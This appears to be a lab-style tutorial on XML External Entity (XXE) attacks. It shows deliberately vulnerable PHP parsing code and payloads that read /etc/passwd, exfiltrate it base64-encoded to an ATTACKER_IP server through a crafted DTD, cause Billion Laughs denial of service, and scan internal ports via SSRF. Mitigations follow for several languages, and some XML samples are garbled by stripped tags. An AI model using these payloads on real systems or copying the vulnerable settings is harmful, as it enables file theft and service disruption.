XML
What is XML?
XML (Extensible Markup Language) is a markup language derived from SGML (Standard Generalized Markup Language), which is the same standard that HTML is based on. XML is typically used by applications to store and transport data in a format that's both human-readable and machine-parseable.
XML is widely used in web applications for data exchange, storage, and configuration. It's often used for web services and APIs, such as SOAP and REST, to exchange data between systems. XML is also used for configuration files, such as web server configurations or application settings.
Syntax and Structure
XML elements are represented by tags, which are surrounded by angle brackets (<>). Tags usually come in pairs, with the opening tag preceding the content and the closing tag following the content. For example:
John
30
123 Main St
Anytown
The tag
represents an element named "name" with the content "John". Attributes provide additional information about elements and are specified within the opening tag. The tag
specifies an attribute "id" with the value "1" for the element "user". Character data refers to the content within elements, such as "John".
The example above shows a simple XML document with elements, attributes, and character data. The tag declaration indicates the XML version, and the element contains various sub-elements and attributes representing user data.
What is XSLT?
XSLT (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents. While XSLT is primarily used for data transformation and formatting, it is also significantly relevant to XXE (XML External Entities) attacks.
XSLT can be used to facilitate XXE attacks in several ways:
- Data Extraction: XSLT can be used to extract sensitive data from an XML document, which can then be used in an XXE attack. For example, an XSLT stylesheet can extract user credentials or other sensitive information from an XML file.
- Entity Expansion: XSLT can expand entities defined in an XML document, including external entities. This can allow an attacker to inject malicious entities, leading to an XXE vulnerability.
- Data Manipulation: XSLT can manipulate data in an XML document, potentially allowing an attacker to inject malicious data or modify existing data to exploit an XXE vulnerability.
- Blind XXE: XSLT can be used to perform blind XXE attacks, in which an attacker injects malicious entities without seeing the server's response.
What are DTDs?
DTDs or Document Type Definitions define the structure and constraints of an XML document. They specify the allowed elements, attributes, and relationships between them. DTDs can be internal within the XML document or external in a separate file.
Purpose and usage of DTDs:
- Validation: DTDs validate the structure of XML to ensure it meets specific criteria before processing, which is crucial in environments where data integrity is key.
- Entity Declaration: DTDs define entities that can be used throughout the XML document, including external entities which are key in XXE attacks.
Internal DTDs are specified using the declaration, while external DTDs are referenced using the SYSTEM keyword.
<!ELEMENT database (username, password)>
<!ELEMENT username (#PCDATA)>
<!ELEMENT password (#PCDATA)>
]>
DTDs play a crucial role in XXE injection, as they can be used to declare external entities. External entities can reference external files or URLs, which can lead to malicious data or code injection.
XML Entities
XML entities are placeholders for data or code that can be expanded within an XML document. There are five types of entities:
- Internal Entities are essentially variables used within an XML document to define and substitute content that may be repeated multiple times. They are defined in the DTD (Document Type Definition) and can simplify the management of repetitive information. For example:
]>
&inf;
In this example, the &inf;
entity is replaced by its value wherever it appears in the document.
- External Entities are similar to internal entities, but their contents are referenced from outside the XML document, such as from a separate file or URL. This feature can be exploited in XXE (XML External Entity) attacks if the XML processor is configured to resolve external entities. For example:
]>
&ext;
Here, &ext;
pulls content from the specified URL, which could be a security risk if the URL is controlled by an attacker.
- Parameter Entities are special types of entities used within DTDs to define reusable structures or to include external DTD subsets. They are particularly useful for modularizing DTDs and for maintaining large-scale XML applications. For example:
<!ELEMENT name (%common;)>
]>
John Doe
In this case, %common;
is used within the DTD to define the type of data that the name
element should contain.
- General Entities are similar to variables and can be declared either internally or externally. They are used to define substitutions that can be used within the body of the XML document. Unlike parameter entities, general entities are intended for use in the document content. For example:
]>
&author;
The entity &author;
is a general entity used to substitute the author's name wherever it's referenced in the document.
- Character Entities are used to represent special or reserved characters that cannot be used directly in XML documents. These entities prevent the parser from misinterpreting XML syntax. For example:
- `<` for the less-than symbol (`<`)
- `>` for the greater-than symbol (`>`)
- `&` for the ampersand (`&`)
Use < to represent a less-than symbol.
This usage ensures that the special characters are processed correctly by the XML parser without breaking the document's structure.
The image below shows the type of entities in a DOM structure:
XML Parsing
XML parsing is the process by which an XML file is read, and its information is accessed and manipulated by a software program. XML parsers convert data from XML format into a structure that a program can use (like a DOM tree). During this process, parsers may validate XML data against a schema or a DTD, ensuring the structure conforms to certain rules.
If a parser is configured to process external entities, it can lead to unauthorized access to files, internal systems, or external websites.
Common XML Parsers
Several XML parsers are used across different programming environments; each parser may handle XML data differently, which can affect vulnerability to XXE injection.
- DOM (Document Object Model) Parser: This method builds the entire XML document into a memory-based tree structure, allowing random access to all parts of the document. It is resource-intensive but very flexible.
- SAX (Simple API for XML) Parser: Parses XML data sequentially without loading the whole document into memory, making it suitable for large XML files. However, it is less flexible for accessing XML data randomly.
- StAX (Streaming API for XML) Parser: Similar to SAX, StAX parses XML documents in a streaming fashion but gives the programmer more control over the XML parsing process.
- XPath Parser: Parses an XML document based on expression and is used extensively in conjunction with XSLT.
In-Band vs Out-of-Band XXE
In-band XXE refers to an XXE vulnerability where the attacker can see the response from the server. This allows for straightforward data exfiltration and exploitation. The attacker can simply send a malicious XML payload to the application, and the server will respond with the extracted data or the result of the attack.
Out-of-band XXE, on the other hand, refers to an XXE vulnerability where the attacker cannot see the response from the server. This requires using alternative channels, such as DNS or HTTP requests, to exfiltrate data. To extract the data, the attacker must craft a malicious XML payload that will trigger an out-of-band request, such as a DNS query or an HTTP request.
In-Band XXE Exploitation
Click the submit button and intercept the request.
The submitted data is processed by contact_submit.php, which contains a vulnerable PHP code designed to return the value of the name parameter when a user submits a message in the form. Below is the vulnerable code:
libxml_disable_entity_loader(false);
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$xmlData = file_get_contents('php://input');
$doc = new DOMDocument();
$doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);
$expandedContent = $doc->getElementsByTagName('name')[0]->textContent;
echo "Thank you, " .$expandedContent . "! Your message has been received.";
}
Why the Code is Vulnerable
- Entity Expansion is Enabled:
- The line `libxml_disable_entity_loader(false);` explicitly allows external entities to be loaded.
- When `LIBXML_NOENT` is used in the `loadXML()` method, it tells the parser to replace any external entities in the XML with their actual values.
- External DTD Loading is Enabled:
- The `LIBXML_DTDLOAD` option allows the XML parser to load external DTDs. This is dangerous because an attacker can supply a malicious DTD that defines external entities pointing to sensitive files or network resources.
- No Validation or Sanitization of Input:
- The script directly takes user-supplied XML input from `php://input` and processes it without validating or sanitizing the content.
How XXE Can Be Exploited
Since the application returns the value of the name parameter, we can inject an entity that is pointing to /etc/passwd
to disclose its values.
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
&xxe;
[email protected]
test
Using the payload above, replace the initial XML data submitted to contact_submit.php and resend the request. Don't forget to change the name;
to &xxe;
.
How to Mitigate XXE Vulnerabilities
- Disable External Entity Loading:
- Use `libxml_disable_entity_loader(true);` (for PHP < 8.0).
- For PHP >= 8.0, external entity loading is disabled by default.
- Do Not Use
LIBXML_NOENT
orLIBXML_DTDLOAD
:
- Avoid these options unless absolutely necessary. If you must use them, ensure input is from a trusted source.
- Use
LIBXML_NONET
:
- This disables network access during XML parsing:
`phpCopy code$doc->loadXML($xmlData, LIBXML_NONET);`
- Validate and Sanitize Input:
- Ensure the XML input comes only from trusted sources.
- Validate the input against a strict XML schema (XSD) to ensure it doesn't contain unexpected DTDs or entities.
- Consider Alternative Libraries:
- Use libraries like `simplexml_load_string()` without DTD loading, or JSON for safer data transfer.
- Keep Your Software Updated:
- Ensure PHP and any libraries are updated to their latest versions to benefit from security fixes.
libxml_disable_entity_loader(true); // Disable external entity loading (for PHP < 8.0)
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$xmlData = file_get_contents('php://input');
$doc = new DOMDocument();
$doc->loadXML($xmlData, LIBXML_NONET); // Disable network access
$expandedContent = $doc->getElementsByTagName('name')[0]->textContent;
echo "Thank you, " . htmlspecialchars($expandedContent) . "! Your message has been received.";
}
XML Entity Expansion
XML Entity Expansion is a technique often used in XXE attacks that involves defining entities within an XML document, which the XML parser then expands. Attackers can abuse this feature by creating recursive or excessively large entities, leading to a Denial of Service (DoS) attack or defining external entities referencing sensitive files or services. This method is central to both in-band and out-of-band XXE, as it allows attackers to inject malicious entities into the XML data. For example:
<!ENTITY xxe "This is a test message" >]>
&xxe; &xxe;
[email protected]
In the payload above, &xxe;
is expanded wherever it appears. Attackers can use entity expansion to perform a Billion Laughs attack, where a small XML document recursively expands to consume server resources, leading to a denial of service.
Direct Recursive Entities
A direct recursion occurs when an entity references itself, either directly or in a way that leads to an infinite loop. Here's a simple example:
]>
&x;
In this case, if &x;
is called, it would replace the x as &x;
, meaning it will have &&x;;
, and so on, causing an direct infinite recursion.
Indirect Recursive Entities
Indirect recursion occurs when an entity references another entity, which in turn references the original entity, creating a loop. This results in exponential growth because the parser replaces each entity with another entity that keeps expanding until the system runs out of resources.
Here’s an example of indirect recursion:
<!ENTITY y "&x;&x;">
<!ENTITY z "&y;&y;">
]>
&z;
- The entity
x
is defined as"A"
. - The entity
y
references&x;&x;
, meaning it will expand to"AA"
. - The entity
z
references&y;&y;
, which means it will expand to"AAAA"
, because&y;
is"AA"
. - So,
&z;
will expand to"AAAAAAAA"
, doubling in size as it goes.
Exponential Growth
Now, imagine if you continued chaining references like this, with each entity expanding further:
<!ENTITY y "&x;&x;">
<!ENTITY z "&y;&y;">
<!ENTITY w "&z;&z;">
]>
&w;
-
&w;
would expand to&z;&z;
, which then expands to&y;&y;&y;&y;
, which expands to&x;&x;&x;&x;&x;&x;&x;&x;
— and so on. - Each step doubles the size of the entity, so the document size grows exponentially as the parser processes the entities.
The Billion Laughs Attack
In the Billion Laughs attack, this kind of recursive entity expansion is used to create a document that expands exponentially and quickly consumes all available system resources (CPU, memory, etc.), effectively causing a denial-of-service (DoS) attack.
For example:
<!ENTITY b "&a;&a;">
<!ENTITY c "&b;&b;">
<!ENTITY d "&c;&c;">
<!ENTITY e "&d;&d;">
<!ENTITY f "&e;&e;">
]>
&f;
-
&f;
expands to&e;&e;
,&e;
expands to&d;&d;
, and so on, doubling in size at each level. - After just a few iterations, the document size grows massively, and it can easily reach billions of characters.
Out-Of-Band XXE
The application uses the below code when a user uploads a file:
libxml_disable_entity_loader(false);
$xmlData = file_get_contents('php://input');
$doc = new DOMDocument();
$doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);
$links = $doc->getElementsByTagName('file');
foreach ($links as $link) {
$fileLink = $link->nodeValue;
$stmt = $conn->prepare("INSERT INTO uploads (link, uploaded_date) VALUES (?, NOW())");
$stmt->bind_param("s", $fileLink);
$stmt->execute();
if ($stmt->affected_rows > 0) {
echo "Link saved successfully.";
} else {
echo "Error saving link.";
}
$stmt->close();
}
The code above doesn't return the values of the submitted XML data. Hence, the term Out-of-Band since the exfiltrated data has to be captured using an attacker-controlled server.
For this attack, we will need a server that will receive data from other servers.
python3 -m http.server 1337
Upload a file in the application and monitor the request that is sent to submit.php
using your Burp. Forward the request below to Burp Repeater.
Using the payload below, replace the value of the XML file in the request and resend it. Note that you have to replace the ATTACKER_IP variable with your own IP.
<!ENTITY xxe SYSTEM "http://ATTACKER_IP:1337/" >]>
&xxe;
Send the modified HTTP request.
After sending the modified HTTP request, the Python web server will receive a connection from the target machine. The establishment of a connection with the server indicates that sensitive information can be extracted from the application.
We can now create a DTD file that contains an external entity with a PHP filter to exfiltrate data from the target web application.
Save the sample DTD file below and name it as sample.dtd
. The payload below will exfiltrate the contents of /etc/passwd
and send the response back to the attacker-controlled server:
<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://ATTACKER_IP:1337/?data=%cmd;'>">
%oobxxe;
DTD Payload Explained
The DTD begins with a declaration of an entity %cmd
that points to a system resource. The %cmd
** entity refers to a resource within the PHP filter protocol php://filter/convert.base64-encode/resource=/etc/passwd
. It retrieves the content of /etc/passwd
, a standard file in Unix-based systems containing user account information. The convert.base64-encode
filter encodes the content in Base64 format to avoid formatting problems. The **%oobxxe
entity contains another XML entity declaration, exfil
, which has a system identifier pointing to the attacker-controlled server. It includes a parameter named data with %cmd
, representing the Base64-encoded content of /etc/passwd
. When %oobxxe;
is parsed, it creates the exfil
entity that connects to an attacker's server (http://ATTACKER_IP:1337/
). The parameter ?data=%cmd
sends the Base64-encoded content from %cmd
.
Go back to the repeater and change your payload to:
&exfil;
Resend the request and check your terminal. You will receive two (2) requests. The first is the request for the sample.dtd file, and the second is the request sent by the vulnerable application containing the encoded /etc/passwd.
Decoding the exfiltrated base64 data will show that it contains the base64 value of /etc/passwd, using CyberChef.
SSRF + XXE
Server-Side Request Forgery (SSRF) attacks occur when an attacker abuses functionality on a server, causing the server to make requests to an unintended location. In the context of XXE, an attacker can manipulate XML input to make the server issue requests to internal services or access internal files. This technique can be used to scan internal networks, access restricted endpoints, or interact with services that are only accessible from the server’s local network.
Internal Network Scanning
Consider a scenario where a vulnerable server hosts another web application internally on a non-standard port. An attacker can exploit an XXE vulnerability that makes the server send a request to its own internal network resource.
For example, using the captured request from the in-band XXE task, send the captured request to Burp Intruder and use the payload below:
<!ENTITY xxe SYSTEM "http://localhost:§10§/" >
]>
&xxe;
[email protected]
test
The external entity is set to fetch data from http://localhost:§10§/
. Intruder will then reiterate the request and search for an internal service running on the server.
Steps to brute force for open ports:
- Once the captured request from the In-Band XXE is in Intruder, click the Add
§
button while highlighting the port.
- In the Payloads tab, set the payload type to Numbers with the Payload settings from 1 to 65535.
- Once done, click the Start attack button and click the Length column to sort which item has the largest size. The difference in the server's response size is worth further investigation since it might contain information that is different compared to the other intruder requests.
How the Server Processes This:
The entity &xxe;
is referenced within the
tag, triggering the server to make an HTTP request to the specified URL when the XML is parsed. The response of the requested resource will then be included in the server response. If an application contains secret keys, API keys, or hardcoded passwords, this information can then be used in another form of attack, such as password reuse.
Potential Security Implications
- Reconnaissance: Attackers can discover services running on internal network ports and gain insights into the server's internal architecture.
- Data Leakage: If the internal service returns sensitive information, it could be exposed externally through errors or XML data output.
- Elevation of Privilege: Accessing internal services could lead to further exploits, potentially escalating an attacker's capabilities within the network.
Mitigation
Avoiding Misconfigurations
Misconfigurations in XML parser settings are a common cause of XXE-related vulnerabilities. Adjusting these settings can significantly reduce the risk of XXE attacks. Below are detailed guidelines and best practices for several popular programming languages and frameworks.
General Best Practices
- Disable External Entities and DTDs: As a best practice, disable the processing of external entities and DTDs in your XML parsers. Most XXE vulnerabilities arise from malicious DTDs.
- Use Less Complex Data Formats: Where possible, consider using simpler data formats like JSON, which do not allow the specification of external entities.
- Allowlisting Input Validation: Validate all incoming data against a strict schema that defines expected data types and patterns. Exclude or escape XML-specific characters such as <, >, &, ', and ". These characters are crucial in XML syntax and can lead to injection attacks if misused.
Mitigation Techniques in Popular Languages
Java
Use the DocumentBuilderFactory
and disable DTDs:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
.NET
Configure XML readers to ignore DTDs and external entities:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
PHP
Disable loading external entities by libxml:
libxml_disable_entity_loader(true);
Python
Use defusedxml
library, which is designed to mitigate XML vulnerabilities:
from defusedxml.ElementTree import parse
et = parse(xml_input)
Regularly Update and Patch
- Software Updates: Keep all XML processors and libraries up-to-date. Vendors frequently patch known vulnerabilities.
- Security Patches: Regularly apply security patches to web applications and their environments.
Security Awareness and Code Reviews
- Conduct Code Reviews: Regularly review code for security vulnerabilities, especially code that handles XML input and parsing.
- Promote Security Training: Ensure developers are aware of secure coding practices, including the risks associated with XML parsing.